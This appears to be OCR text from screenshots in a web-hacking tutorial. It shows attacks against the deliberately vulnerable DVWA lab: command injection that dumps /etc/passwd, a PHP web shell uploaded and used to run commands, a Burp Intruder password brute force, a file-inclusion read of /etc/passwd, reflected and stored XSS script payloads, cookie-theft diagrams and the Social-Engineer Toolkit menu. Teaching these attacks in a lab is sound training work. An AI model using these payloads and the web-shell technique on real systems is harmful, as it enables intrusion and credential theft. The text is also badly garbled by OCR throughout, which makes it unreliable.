rt t *iiri/avy/itiex/:ndev - 0.03270.019/0, 044/0.007 ms
help
index.php
source
Ping for FREE
Enter an IP address below;
submit
PING 127,0.6.1 (127.0.0.1) 56(3-1) bytes of data,
6.1 bytes from 127.3.G.L: icmp seq=l ttl=64 time-0. 040 ns
64 bytes from 127,0.0. l: icmp seg-2 ttl-64 time=e.647 ms
64 bytes from 127.0.0.1: icmp seq-3 ttl-64 t ime=G.039 ms
— 127.0.0.1 ping statistics
—3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/itiax/mdev = 9.03970.042/0.047/0.003 ms
root :x :0:G: root:/ root : /bin/basb
daemon :x:1:1:daemon:/usr/sbin 1 /bin/$h
bin:x :2:2: bin :/bin:/bin/sh
sys:x :3:3:sys:/dev:/bin/sb
sync:x :4:GS534:sync;/bin : /bin/sync
games:x :5:68:games :/usr/games: /bin/sb
man :x :6 :12:maru/var/cache/roan: /bin/s h
Ip :x:7:7:lp:/var/spoot/lpd:/bin/sh
mail :x :3:S:mail:/var/mail:/bin/sfr
news:x :9:9:news:/var/spool/news ; /bin/ sh
uucp; x ; 10:13:uutp: /var/spool/uucp: /bin/sh
proxy : x:13:13: proxy:/bin: /bin/sh
www- data:x:33:33:www-data: /var/ www: /bin/sh
backup :x:34:34 ; backup: /var/backups: / bin/sh
103.
104. Vulnerability: File Uploa
&
H«III
Choosy Afl image Ip upfeaij
SeLuJ) 9lOwÿ .
UploadBlUlt FMC4
Comm.-no ExotuUon
x File Upload
CSRF
i . rootFile Inclusion
SOL injection
5CL liifrcrign (guild)
Places
Search
O Potently Used
r Sire ModifiedName
is' DCSfcTQp 07/10/2012
Upload SOOworet-paHwonds.txt
DW/A install.*h
aYvua_users.txt
. j tocaUiQ&t-chMk.nfc**
w Sheil_y(J_7.php
3.4 KB 07/11/2012
2.7 KB 07/10/2012
12 bytes 07/11/2012
407.4 K0 07/09/2012
17.1KB 03/17/2007
JXSS foUcctfd
r n»t
XSS slerctl
1 113 Desktop
File System
_floppy DoveJOVWA S«y rhey
P HP inlo
About
J if root@bt: /
File Edit View Terminal Help
rootÿljL:/'# find / -name Shell yfl 7.php
/root/SheUjv0_7.php
/v3r/www/hackabWt/ploads/SheU v9 7, php
/tmp/VMwa reDnD/da6c24a6/Shell vij_7, php
rootÿbt : /#
ft
105. Applications Places System
n v n Command Shell -127.0.0.1' Mozllla Firefox
file £dd View History Book marks Toofs Help
+, Command SheJI
-127.0.0.1
§. : . . 127.0.0.1 Mds/Stieii_v0_7.php * <
giaCkTraCk Linux ||Offersive Setun ty Ex pi011 DB Airerock ng jcm i-a FU
|[EHCirtt camnuHl) [UplMdiBe] [Ehingt tUftctwy) [FBehmumr] [Create Fite]
Quick Commands ;i p i
Ocarhittn B »i
I* *Oct' kHcrv
Can 1function?
Ctt stiver into
jT] I V j j n
Read /etc/piHwd hr-litiH!,
Open p*rti
Running! prtKeite t j; jl! i T* 1
i i
Readme
mCommand hlsto
sixflhetft
.1FT [r] ,i M [rl jJ'J [L ft] [-1
/i IL-H [l
*
[ÿIill
rIT-I
m [VI [ÿ_ 1 r-i1, [ÿÿj1.
About
AJax/PHP
Command Shell
try InsnftSt
Vwmn 0 7ft / Y*rfwYrnJ njc n tfcrt / y phud i/
106. * Command Shell -127.0.0.1 - MoztHa Firefcot
File Edit View History Bookmarks Tools Help
404 Not FoundCommand Shell -127.0.0.1 X +
S 127.0.0.1
_j_t
_ :oa
2BackTrack unux []Otfensive Security gjExploit-DB Aircrack-ng gjSomaFM
[Execute command] [Upload file) [[hinge directory] [File brawler] [Create File]
Quick Commands ,
dal a-# netstat -an | grep -i listen
0 127.0,0.1:7337
0 127.0.0,1:3306
0 0 0-0-0:80
0 ::1:7337
0 127.0,0,1:0030
0 0.0.0,0:*
O.G.O.O:*
0-0 0 Q:*
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
01 r Screen
0tip
Clear Hhrtory
tep 0
[ Cen 1 function? tcpG
ItcpS
0 *
G s t i*
[Execute command] [Upload file] [Change directory] [Filebrc wser] [Create File]
ww-data-# Is
IShel.ljfG_7.php
Wvva_eniail .png
-data-# ikdir goats
WWW-data-# Is
|SheU_vG_7.php
dvwa_email .png
[goatsJ
WWW -data # cd goats
.Current directory changed to goats
WWW-data-# touch bah.txt
WWW-data-# Is
bah.tKt
107.
108.
109.
110.
111. Vulnerabifity: Brute Force
Login
UMtTWTW.
caraoji
Paii™a
E
uyn
burp intruder repeater window about
I target [ prwy f spider~f scanner [ intruder f repeater [ sequencer [
intercept '
options history |_
request to http:Wl 27.0.0.1:60
drop intercept is on
f raw [ panam6~7 headers 1 hew |_
GET request to toJlnerabiirties/brute/
forward action
valuetype name
URL comdoqsusername
password Sureareyummy
URL login Login
cookie PHPSESSID m7cOuorvtemesgddjbv5oj4ue2
cookie lowsecurity
112. burp intruder repeater window about
( target proxy j' spider scanne intruder ! repeater sequencer decoder comparer options j a
intercept§ options J history [
Filter; hiding CS1;, image ;r J general binary content
host method URL
htt p://safebrqwsmg d..,
’
POST ysafebrowsinqfdowrioads?cItent navdient-auto-ffox6fappver-i6...,
http:Ifl27,0,0,1 GET 'Milnerabilit ies/brutej?username-corndogs(*password-surearey...
httpiffl27.0,0,1 GET MJlnerabifltiesfbrute/?usemame-comdqgs&password-surearey.,,
457 http://safiebrowsing-c... [GET [/safebrowsing/Td/ChNnb29nLWl hbHdhctnUtc2hhd niFyEAEYht OF(J|...
499 http:/fl27.0,0,1 [GET l/dvwaflsJdvwaPageds
SOI ht tp://safebrowsing-c.„ . GET /safebrowsing/rd/chNnb29nLWl hbHdhcmutc2hhdniFyEÿVh.iFijc..,
htt p:jYsaf ebrowsing GET rsafebrowsing/rd/chrtnb29mwl hbnd hemutt 2hhd mFyEAflYfcaYRo...
*
494
-495
A
502
request [response j _
[ raw f parents f headers T hex |
: GET request to MJlnerabilitiesÿbrute/
valuetype name
URL corncfogsusername
password SLirear&yumnny
URL Login Login_ __
m7cbuorvtBm8sgddibv5ojJ ua 2conkie
cookie
PHPSESSlD
lowsecurity
113. 496 HttprOT27.0,0.1
http:W127.0.0, li'vulnerab...sword -sureareyummy&LoqirT- Login j497
499 hTtpiy/U'.-.o.o.i remove item from scope
htt p://safebrow501 spider From here
actively scan this
i
send to intruder
send to repeater
send to sequencer
send to comparer (request)
send to comparer (response)
show response in browser
request in browser_
Ihttp;y/safebrowM2
*
request [ respons
( raw (' parents [ h
GET request to h/ulr
type
URL usernai
URL passwo
'Login
PI HP'SE<
Secur tj
UPL
Cookie
cookie
engagement tools [pro version only]
show new history window
add comment
highlight
delete this item
clear history
copy URL
copy links in item
save item
i
target fflHM spider nner f intruder ] repeater sequencer|decoder [ comparer |' optionin'' alerts |
£TJ>
I target ' positions ' payloads ' options |
attack type sniper
5 payload positions
GET /vuLntmbi lititsibiut*/ ?us-i:n«i>r-St:or ndog»lft.pjiasword-Jaur tareyunmyS£ Loyin-SLoginJ HTTP/1.I
Host: i:7, 0,0.1
Mitr-Acrtnc; Mosuln/S.O (Xil: Llimw liOfi rv:US,U.2> Gecko/ 20100101 Firete*/ 10,0,2
Jtc-oept : tex t!ht ml.app11cat Ion/ n htm1+xml,app i1cat ion/ xml ; q 0.9, / ; q'Q £3
Accept-LAliynaye: en-ua,en:q-0.5
Acctpr-Entodlno; osip, dttlatt
Proxy-ConnccE Ion ; lie*p™n Live
: tittp://i;7.0,0.1f vulnctah1lit iea/brUEc/
Cookie r PHP3ESS ID»ltB7eduotyttofl30ddybvSo3414*21: aecur ity*S1L>VS
DMT: i
114.
115. - d uwa_usersrtnt IH -gedit
File Edit View Search idols Documents
i O'tsaye
Mopen *
<Jvwa_users,tict It
asuifi
gordonb
1337
pablo
smithy)
Target Positions I Payloads 1 Options |
|7j Payload Sets
You (in define one or more payload Sets The number of payload sett depends on the attack
customized in different ways
Payload count. 2 (appro*!Payload set _
Payload type: Runtime hit ZJ Redueit count: 0
Payload Options (Runtime tilej
This payload type Jets you configure a hie from which to read payload itnrgs at runtime
Select tile . /dwra users tct
119. ideally loken HUE:spouse
token Joeabon capture options
O cookie.
O form lieu
* manual selection'
BBC-U IQ= 64d733(1(14acb9372bCfiedSa6613tf251aÿOct?54 1 501 v
Tdssi-Internal OnSi
HTTPfi 1 200 Ok
Dale Hi. I & Nov 2007 14 33 50 GMT
Sewer Apache
Set-CPokie B8CNrcrsAjutJtence= Domeshe; paSiÿl; domainÿ bbt ro jk; eÿpiresÿSat,
t7-No*2Q07 14:38.50 OhflT
Set-Ootids:
£BC- UlDÿ 34<J73SdiMac b9872bcSed9a'oB1 afiQSI aSOdeCJ t SOI 091 377ac 4cl M baa25
mmcfllla*2*f%2e0%20%7ficompsbi)te%3s%20m$iE%20?%2e0%3H%2Gv4ndows
%20NTO2(K%2et%3b%20lnfoPilk%2e I %3b%20% 2eNCT%20CLR K.202%2e0%2e5
0727%.’9; expires=$aT, 15-nijiaCO 14:3050 OWT; path=i; aomain=i)Dt.oouk,
Accept-Range? lute?
Cache-Control mav.age=0
token stalls:
-mt>=•Slier SXPreSSfOM
. al offset t94
lukeii ends:
•a!delimiter
al fixed length
Moul
55
Ear Omaitneo
stall capture
120. Overall result
Ths (jveral i quai itv of raniomness wdhin [he sample is eslmaled to be:encefent
sign finance level of i % theimounioreflech-e entropy is estirraiedip&e H6 toils
effective emi ci|ny
The ch-ar; shwi m? nu m her ef tiits ureffective enl ropy at each sign finance leva1, hased t-n aH l?sls Each sign-fican( e I evei dtfines a rr mi mum
srflbabiiiv atHie observed insults ectuir iry if mesample is ranaemtvgenerated w»fl ihe prt>:n a biiiiy at(He ptserved result? atemm p falls betel*
mi? i mi trefivpomesis ihai ine sampie is ramprinty peneja:ed is rejected o?ing a tpwer sign titan ce level means thatsdonser evid ent e is
required to reiect tne nypothesis that:ha sample - 1andem, and so incrants it e chartce ih at nonrandom date w II he treaie d as random
*10%
Significance level
>0.t%
>001%
>0.0(Jt%
0 to 20 30 40 60 60 70 00 90 190 110 120 tOO 140 160 160 1 70
Number of bits oi enlrony
Relinbilfly
The analysis, is DsseaonasampieefJtOT tokens 3asec onihe sample sue, tne reliability of tee results is ie*senable
no;e hei statistical tesis pnevide eniy?n indicative gjideio me randomness srthe sampled oaia Results coiamed mayconi? n raise pÿmves and
negatives and may nonowespend 10 the preclifsi unseietabiirty af :he tokens sampEed.
123. /
T
bin etc varusr
l
IP L-tons of
apps
passwd
_ lib WWW
file
I
|dvwasrc
L
r
I css
L
r
] images
y
{includes
y
r,
I J* y
124. v
* root@bt: fvar/www/dvwa
File Edit View Terminal Help
root@ht:~# Is
Desktop DVWA_install,sh localhost-check.nbe ZAp.html
rootgbt:-# cd ../
root@bt:/# Is
bin dev
boot etc lab
cdrom hone lost+found opt
rootgbt:/# cd var
root@bt:/var* Is
backups
cache lib _
root@bt:/var# cd www
root(|bt;/var/www# Is
dvwa
external
4
initrd.ijng eedia pentest sbin
mnt proc
root
srv usr
selinux sys var
share vnlinuz
local log opt spool www
run [JJS yp
about.php
CHANGELQG.txt
config
COPYING.tXt
index. php
instructions. php README.txt
robots.txt
security.php
setup. php
php.ini vulnerabilities
wstool
favicon.ico login.php
hackable logout.php
ids log.php phpinfo.phpdocs
root@bt:/var/www# cd dwa
root@bt:/var/www/dvwa# Is
css inages includes js
root@bt:!va r/www/dvwa#
r* n ix
125. Applications Places System
-ÿ
- Damn Vulnerable Web App {DVWAJ vl.0.7 :: Vulnerability: File Inclusion - Mozilla Fire1
£ile Edit History gookmarks Joels yelp
A
SI Damn Vulnerable Web App (DV... +
<f3 S. E 127.0.0 1
53BackTrack Li: r |i|offensive Security ng .pomaFM
ooncO O:n»t/raoiwivt»tii daemon or i ivsaernori-.usrtj&iri /tiiri.sri om x 2 icinyum junrirsnsirs>};J sys.'dev/tnn.'&h sync u 65334syi
ftpoflUpdrarLfeti mailxB.s.niurlAariTnaili/bin'sli MwueSSfnmvaiSvwftpaaltamtiBAlnAri uuefvx lQ:lO:uuep:fV0r'fc{>ea(fLiLicpjbiii/4b pru
tm-sJi list* 30 38 MnilinflLlJ!Managtrjarflt5lJbinÿhifCJf:39 39.JrKl AHifÿUjnJrif«JVtJrn/B*i gnalsx'i) 41;Grate Sug-Refiorltng Syilsm [q<
ahdJL102:65054:jVarphin/»tt(J Aisrrtfcin/lnolooln landscspÿx103.1OS:Aof niMandfcotw J&lnrfols* ITTC ssagcbusx 104.1 12:JvaWuiiAatm
Furahij::106.114 ..‘varfrunyovahi-daemonubin.Tals* SJiortx-107 115 Snc-rt rDS ,ar 1o(j.,sn.ort’,bin.,fjir.E» x 108 6553-’. 'af ,1jb.Tifsi.tin fa I
nm.lai' -? fesDvai.a:i12:ÿ9.:-tiorr>C'll0sbvaiA>nrtjiK poatares:x: lOOOiiOOOiÿiomg.'pQsmres.-Tjin.'sn _
Home
126.
127.
128.
129.
130.
131.
132.
133.
134. 5- Malicious
script
executes s~ÿ—
a 2, Send malicious link
6. Cookie is sent
User! HackerA. Respond with
malicious script
* 7. Masquerade as victim
1. Log in
+-
3. Send malicious request
Web application
135. Vulnerability: Reflected Cross Site Scripting (XSS)
ill's your
jRod was here!
Hello
OK
intercept server responses
content t/p? [matches
[ÿintercept if; H update Content-Length
] @m tent edit
iwas modifiedrequestor
ras interceptedreqi lestor remove
I . and response code does not match "304$
and URL is in target scope up
136. raw : params i headers j hex .
C>£T request to Mjlnerat>ilities/xss_rt
valuetype name
%2Cscript%3EALERT%20%20JRod+was+ herg%21%20%20%20ÿscnpt%3EURL NAME
10Elrk8vql4s8i kqatneoÿfjfqcookie PHPSESSID
lowcookie security
burp intruder repeater window about
target ] pns*y | sp.der '
| Inlert-apt | options ] history j
response frcm httpy/L 2?.O.Q_1:SOMjInprÿh ilRies*ssjffname-%3CSCript%3Eale rt%ig*2JJftod-rwa,s+ here*,JIV.22%23%3CW 2tscript%:i
iMruder rfptJter sequencer ' decoder ror'ipir-i options alertsoan'ie'
rumaril drop ntorcept ii on action
<div C lA33“"lS0dV_|iiHltlÿtl">
<hir'Vulnerability: Reflected Cross Site Scripting |XSS)</hl>
<dLv cla*a“"vulti*cAble_cod*_iteA
<f urm n«ne-">;S3<' Action-"*" KEhod-"QETH>
<p>W1utr a your iumr?</p>
<input name-"clam*":*
sinj>uc cype="i5tt])wic" VtUue=,,3stibmicM>
&cpctsltaiu <3 - ;ÿ ipr. >aJ.ert( "-JRod ||eie " ) c r 1 ]>r ></ pt T>
t
'
-:i LV>
137. b-urpK intruder repeater window about
spider ! 1 ntruder
1
repeater ; sequencer 1
decoder [ comparer 1
options i aterts itarget
*:script •aierBC'Jftod was hefe!!l)</&cnpt>
* -he*
decode as... |ÿ|
encode as ...
plain
url
h t ml
heisi
asciE he*
hex
edÿl
binary
%3c%7ÿ6i3%72%6W70%74%3e%61%6c%6S%72%74%28%22%4a%ÿ2%6f%64%20%77%&l%73%20%63%6S%
72%65%21%22%2&%.3cÿ2r%7 3%& 3%72%fiÿ70%74%3e
138. | target proxy '
_spider_ intruder_ '
repeater j sequencer decoder ["comparer options
| Intercept opttonT~[history ] _
request to http:#127.0.0.1(30
-,i.
drop intercept is onforward action
( raw params [ headers-!' hex j
GET request to MJlnerabilitiesMsjV
valuetype name
1%7 3%20ft6S% 21%22%29%3c%2W73%fe3%72%69%70%74%3e
10tlrkayql4sekkqacneo55fq7
URL NAME
Bcookie
c or ie
PHPSE59ID
security low
EHe Edit VJew History Bookmark Tjwis Help
ffiDamn vulnerable Web ftpp (0V._.
S IB Q.qimiifterdUii.Ei&sftss_rÿn-3me=ÿstri(xyaieni-jRortHas hgre!")<%7fscMptJ-ÿ
Lmi;n ['Joffensive Security UL*p!cn!-D& Aircnatk-ng jÿrbomaFH
140. 4, Malicious
script
executes
A S. Cookie is sent
User 3, Respond with
maliciousscript
Hacker
Masquerade as victim
- -
Web application
2. View vulnerable page
while authenticated
1. Plant stored XSS attack
141. Vulnerability: Stored Cross Site Scripting (XSS)
Nam*
*-&cnpt>alerirThe Fed* are walctnng ros"Ji<JStnpt>
Message ’
A
Vulnerability: Stored Cross Site Scripting (XSS)
Name '
The Feds ere watching me
Message 1
i
OK
Kane: lesl
Message: This is a lest comment.
Name: Dave
Message. I like hugs
Marne- Kenh
Message:
142.
143. The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2} Fast-Track Penetration Testing
3} Third Party Modules
4) Update the Hetasploit Framework
5) Update the Social -Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social -Engineer Toolkit
in
set*|
144.
145.
146.
147.
148.
149. tuuitter
Twitter Is over capacity.
H 'i
of1w
e»5* I.w U>J*TVt C**W1 Irÿrt tr- m*s *6* tQi Pinny